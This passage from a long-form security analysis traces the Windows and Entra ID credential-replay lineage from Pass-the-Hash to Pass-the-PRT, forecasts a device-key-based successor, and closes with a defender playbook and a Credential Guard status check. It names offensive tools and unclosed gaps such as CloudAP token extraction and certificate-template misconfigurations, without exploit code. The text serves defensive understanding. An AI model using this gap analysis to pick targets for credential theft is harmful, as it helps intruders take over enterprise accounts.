The matrix and the storage-class table jointly produce the structural prediction: each generation shifts to the next available long-term artefact whose storage class the latest defense does not isolate. The graph-based formalisation of these storage-class transitions is the BloodHound edge catalog -- the HasSession, AdminTo, and CanRDP family that operationalises "which principal can reach which credential from where" as a queryable property of an enterprise's directory [@bloodhound-edges]. The pattern predicts a Generation 6 outside whatever isolation scope arrives next.

The most credible candidate today is Pass-the-DeviceKey: extraction or abuse of the device transport key the PRT binds to, or of the CloudAP-derived material the cookie-signing process produces from it [@mollema-prt-phishing]. Mollema's 2023-2025 continuation work documents the underlying device-transport-key primitives in detail; the September 2025 Actor-tokens disclosure (CVE-2025-55241) demonstrated a fully operational cross-tenant impersonation primitive, responsibly disclosed and patched before any in-the-wild abuse, an adjacent cloud-token-validation failure rather than a device-key primitive [@mollema-actor-tokens] [@mollema-federated-credentials].

flowchart TD A1[Pass-the-Hash 1A Samba
Ashton 1997] A2[Pass-the-Hash 1B Windows-native
Ochoa 2008] A3[Pass-the-Ticket
Delpy 2011] A4[Overpass-the-Hash
Delpy / Metcalf 2014] A5[Pass-the-Certificate
Schroeder + Christensen 2021] A6[Pass-the-PRT
Mollema + Delpy 2020] A7[Pass-the-DeviceKey forecast] D1[Mitigating-PtH whitepapers
v1 2012, v2 2014] D2[Protected Users + RunAsPPL + Restricted Admin
2013-2014] D3[Credential Guard / LSAISO
2015, default 2022] D4[KB5014754 strong mapping
2022, enforced 2025] D5[Token Protection + CAE
2023-2025] D6[CloudAP isolation forecast] A1 --> A2 A2 --> A3 A3 --> A4 A4 --> A5 A4 --> A6 A6 --> A7 D1 --> D2 D2 --> D3 D3 --> D4 D4 --> D5 D5 -.- D6 A2 -.- D1 A2 -.- D2 A3 -.- D3 A4 -.- D3 A5 -.- D4 A6 -.- D5 A7 -.- D6

If the pattern holds, Generation 6 is already in research literature. Mollema's 2023-2025 continuation work [@mollema-prt-phishing] [@mollema-federated-credentials] [@mollema-actor-tokens] documents the device-transport-key extraction primitives. The only things missing are the name and the commodity tool. The historical pattern says we probably get both before VBS-class CloudAP isolation ships.

10. Open Problems and the 2026-2030 Forecast

The credential-replay family has six load-bearing open problems in 2026. Each is structural rather than mathematical; the cryptographic primitives that would close them already exist.

The architectural lower bound -- the only configuration that closes the family in principle -- is the union of three things.

Universal hardware-rooted non-extractable keys: every long-term authentication artefact lives in a TPM, secure enclave, FIDO2 authenticator, or smart card, with key attestation, and is never released to software memory. Universal protocol-layer token binding: every issued token (Kerberos service ticket, OAuth refresh token, OIDC ID token, SAML assertion) is cryptographically bound to the device that requested it, and a verifier rejects any presentation from a non-bound device. Universal continuous evaluation: every protected resource queries the issuer in near-real-time and revokes within minutes of a triggering signal. Each component is deployed somewhere; none is deployed everywhere; no single vendor controls all three layers.

The five concrete open problems flow from the lower bound.

The CloudAP isolation problem. When does Microsoft extend VBS-class isolation to the CloudAP plug-in's working memory in LSASS? No public roadmap as of 2026. Until it ships, Pass-the-PRT remains operationally open against every Entra-joined Windows endpoint.

The token-binding adoption problem. Token Protection's verbatim 2026 scope is the five named resources enumerated in section 8 [@ms-entra-token-protection], which covers approximately five percent of typical Entra-integrated SaaS surface area; every other Entra-integrated resource accepts unbound tokens. The OAuth working group's RFC 9449 (DPoP, September 2023) standardises proof-of-possession at the OAuth layer [@rfc-9449], but adoption across SaaS providers and enterprise applications is uneven.

The Pass-the-DeviceKey forecast. Mollema's 2023-2025 continuation work exercises device-transport-key extraction primitives, federated-credential persistence on Entra applications, and cross-tenant Actor-token abuse [@mollema-prt-phishing] [@mollema-federated-credentials] [@mollema-actor-tokens]. The pattern of every previous generation predicts that whichever of these primitives commoditises first will be the next named "Pass-the-X" technique.

The ESC9-ESC16 hardening problem. The AD CS catalog has grown from 8 entries (June 2021) to 16 (current Certipy and Certify wikis [@certipy-wiki-privesc] [@specterops-certify-wiki]); most additions are misconfiguration-class rather than CVE-class. ESC9 specifically describes the CT_FLAG_NO_SECURITY_EXTENSION template flag that exempts a template from the very SID extension KB5014754 introduced -- so administrators who turn that flag on for legacy compatibility reasons silently re-enable the Certifried-class abuse path on those templates.

Hardware-backed identity ubiquity. When does the union of Pluton + FIDO2 + virtual smart cards + TPM key attestation eliminate the long-term software-extractable artefact class? Human interactive sign-in to Entra ID can already be fully passwordless on supported hardware. The long tail of service accounts, scheduled tasks, on-prem AD workflows, and legacy applications resists migration; the migration is a years-long enterprise project, not a feature flag.

The non-Microsoft sibling lineages. The credential-replay family is not Windows-specific. Okta session-cookie theft, Google IDP refresh-token reuse, Apple ASWebAuthSession token replay, and AWS STS session-token theft all face the same architectural property. An enterprise running Microsoft plus Okta plus Google inherits the union of every vendor's residual replay surface. The family generalises beyond Microsoft because the architectural property generalises beyond Microsoft.

Okta's `sessionToken` and OAuth `refresh_token` artefacts live on the device that requested them, and have been used in commodity offensive tooling since at least 2022. Google's IDP refresh tokens face the same exposure surface on managed Chromebooks. Apple's ASWebAuthSession tokens are device-bound at the platform level, which closes the cross-device replay case but not the same-device extraction case. AWS STS session tokens are not device-bound at all. The credential-replay family is a property of long-term software-extractable authentication artefacts in general; this article is Windows-specific only because Windows has the longest documented lineage.

The institutional position is that the protocol-level fix is unavailable -- Microsoft's framing of Pass-the-Hash as a structural property of NTLM generalises directly to every later generation. A universal fix would require replacing every long-term software-extractable artefact globally with hardware-bound primitives, with mandatory token binding at every issuer and every resource server, with continuous evaluation everywhere. Each step is incrementally closable; the union has not yet closed for any deployment.

Note: Universal hardware-rooted non-extractable keys, universal protocol-layer token binding, universal continuous evaluation. Each component is deployed somewhere; none is deployed everywhere. No single vendor controls all three layers.

The architectural property the family shares has held for twenty-nine years; the defensive lineage will not close it without making every long-term artefact live in hardware-rooted isolation that exceeds the host's privilege. Whether that happens in the next five years, the next ten, or the next twenty-five, is the open question the next chapter of this lineage will answer.

11. The 2026 Defender Playbook

Architectural humility does not mean defensive passivity. The 2026 estate is defensible against generations 1 through 3 and partially against generation 4; the playbook is to deploy every available control while reading Mollema's 2025 posts to know what's coming for generation 5 and beyond.

Credential Guard everywhere it can run. Hardware-eligible non-DC Windows 10/11 endpoints, with the four-residual disclosure (AD database, DCs, certificate keys, CloudAP) documented for the SOC so that detection engineering does not assume Credential Guard covers categories it explicitly excludes [@ms-learn-credential-guard].
LSA Protection (RunAsPPL), UEFI-anchored stacked underneath, per itm4n's "complementary" framing [@itm4n-lsass-runasppl]. The UEFI-anchored variant resists the registry-based bypass that a kernel-mode attacker can otherwise apply at boot.
Authentication Silos and Protected Users for Tier-0 accounts. Expect to encounter unconstrained-delegation breakage on legacy services and budget remediation; the 240-minute TGT cap is the lever that prevents long-lived Tier-0 ticket reuse [@ms-protected-users].
KB5014754 strong-mapping enforcement -- fully on by the September 9, 2025 cutover -- plus an annual certificate-template audit cycle against the ESC1-ESC16 catalog using Certipy or PSPKIAudit [@ms-kb5014754] [@certipy-wiki-privesc]. The audit is the load-bearing control because the strong-mapping fix only closes Certifried-class abuses; the template misconfigurations Schroeder and Christensen catalogued are still administrative responsibility.
Conditional Access with Token Protection where supported -- the five resources Microsoft Learn enumerates [@ms-entra-token-protection]. Device-bound sign-ins for privileged accounts; FIDO2 for human interactive sign-in. Know that the long tail of Entra-integrated SaaS does not enforce binding, and that a stolen PRT used against an unbound resource will still authenticate.
PRT-extraction telemetry. Detect CloudAP-plug-in token access from non-CloudAP processes; tie to Endpoint DLP; alert on out-of-band access to cloudap.dll-owned regions of LSASS memory. Mollema's roadtx and BARK produce signal patterns worth modelling.
Mental model: assume the PRT is the next NT hash. Architect today as if Credential Guard for CloudAP shipped tomorrow -- which means TPM-attested device joins as standard, FIDO2 for every human sign-in, hardware-backed identity for service accounts wherever the vendor supports it, and conditional access policies that treat unmanaged or non-attested devices as untrusted by default.

Open PowerShell as administrator and run:

Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard | Format-List

The result of interest is SecurityServicesRunning. A value of 1 in that list means Credential Guard is actively running (per the Win32_DeviceGuard documentation: 1 = Credential Guard, 2 = HVCI, 3 = System Guard secure launch, etc.). SecurityServicesConfigured tells you what the policy intends; SecurityServicesRunning tells you what the hypervisor is actually enforcing right now. The two values disagree more often than you would expect, usually because the hardware did not meet a prerequisite at boot.

Note: The minimum-viable layer: Credential Guard on every hardware-eligible non-DC endpoint, KB5014754 enforcement-mode certificate strong mapping with an annual ESC catalog audit, and PRT-extraction telemetry tied to a real detection workflow. The first two are commodity Microsoft features that close real attack classes today; the third is the only meaningful signal you can get on the attack class that none of the published defenses currently closes.

None of this closes Pass-the-PRT. All of it shortens the dwell time.

12. Frequently Asked Questions

No. The Primary Refresh Token sits in the CloudAP plug-in, which is outside Credential Guard's verbatim three-credential scope -- see section 6 ("What does Credential Guard isolate?") and section 8 ("Pass-the-PRT defeats three Microsoft defenses simultaneously") for the full mechanism. No. The 1997 Ashton patch and the 2008 Ochoa Windows-native pivot are both pre-Mimikatz; see section 1 and section 3 for the full origin story. Mimikatz is the dominant *tool* (May 2011 first release) but it is not the *origin* of Pass-the-Hash. No. The PRT is *hybrid* -- issued and revoked cloud-side by Entra ID, but stored and used client-side via the CloudAP plug-in inside LSASS. See section 8 ("Where the PRT *lives*") for why this hybrid architecture is what makes Pass-the-PRT operationally tractable today. No. It closed the three Certifried-class CVEs (CVE-2022-26923, CVE-2022-26931, CVE-2022-34691) but not the broader ESC2 through ESC16 catalog. See section 7 ("What does KB5014754 actually close?") and Table 1 for the per-template breakdown. For human interactive sign-in to Entra ID, mostly, if the entire enterprise migrates -- the FIDO2 authenticator holds a non-extractable private key in hardware, and the resulting authentication is bound to that key. For service accounts, scheduled tasks, on-prem Kerberos workflows, hybrid identity scenarios, and the long tail of legacy applications, no -- those paths still rely on long-term software-extractable artefacts (passwords, hashes, keys) by construction. The architectural counter is universal hardware-rooted non-extractable keys plus universal token binding plus universal continuous evaluation; the operational reality is partial coverage. No public v3. See section 5 ("The Mitigating-PtH v3 that never shipped") for the source-by-source disambiguation against Microsoft Download Center ID 36036.

13. The Pattern That Outlived Six Defenses

The 1997 patch and the 2026 attack are the same attack because the architectural property the family shares is unchanged. The artefact moved; the property did not.

A long-term authentication artefact reachable by the using process is replayable. The NT hash sat in LSASS on Windows NT 4.0 and replayed against SMB. The Kerberos TGT sat in LSASS on Windows Server 2003 and replayed against Kerberos services. The NT hash sat in LSASS on Windows Server 2008 and replayed against the KDC's RC4-HMAC authentication path as a real Kerberos client.

The X.509 certificate private key sat in a CryptoAPI key container on Windows Server 2012 R2 and replayed against PKINIT-supporting domain controllers as the principal in the SAN. The Primary Refresh Token sits in the CloudAP plug-in inside LSASS on Windows 11 23H2 today, and replays against Entra ID as the device's user from any machine that holds the extracted session key.

Each defense relocated the artefact to a harder-to-reach storage class. The "Do not store LAN Manager hash" policy retired LM. RunAsPPL marked LSASS as a Protected Process Light. Credential Guard moved NT hashes and TGT session keys out of LSASS in VTL0 into the LSAISO trustlet in VTL1. KB5014754 bound certificates to SIDs at issuance, so that a certificate without the SID extension fails strong mapping at the KDC. Token Protection bound PRTs to devices, so that a stolen PRT used against a supported resource from a non-bound device fails.

Each defense was real. Each closed a generation. The family did not close.

The reason the family does not close is structural. Every generation finds the next long-term artefact whose storage class the latest defense did not isolate. Pass-the-Hash worked because the NT hash was reachable. Pass-the-Ticket worked because the TGT was reachable. Overpass-the-Hash worked because the NT hash was reachable and the KDC accepted RC4-HMAC. Pass-the-Certificate worked because certificate templates were misconfigured and the SID extension did not exist. Pass-the-PRT works because CloudAP is in LSASS in VTL0 and Token Protection covers five resources.

The architectural lower bound -- universal hardware-rooted non-extractable keys plus universal token binding plus universal continuous evaluation -- is the only configuration that closes the family, and it is not deployed anywhere as a complete stack.

The playbook in the previous section is what to do today. The forecast in section 10 is what to architect for next. The closing observation is the one this article exists to register: when you read about the next named "Pass-the-X" technique, you already know what it will look like. A long-term authentication artefact, reachable from the process that holds it, replayed from a different machine, defeating the latest defense because that defense was designed for a different artefact.

Generation 6 is already in research literature. The only thing missing is the name.